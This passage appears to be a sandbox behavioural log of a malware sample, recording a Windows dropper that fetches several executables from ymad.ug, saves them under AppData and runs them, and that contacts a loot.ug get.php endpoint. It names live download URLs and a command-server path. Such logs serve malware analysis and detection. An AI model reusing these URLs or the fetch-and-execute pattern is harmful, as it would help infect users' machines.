Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 2560 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 2560 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, show_window = SW_SHOWNORMAL True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin2.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin2.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 4608 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 4608 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, show_window = SW_SHOWNORMAL True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 7680 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 7680 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, show_window = SW_SHOWNORMAL True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/3.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/3.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/4.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/4.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/5.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/5.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 3072 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 3072 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, show_window = SW_SHOWNORMAL True 1
Fn
Thread 0x9cc
63 8
»
Category Operation Information Success Count Logfile
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Inet Read Response size = 1024, size_out = 103 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Thread 0x9e0
820 0
»
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
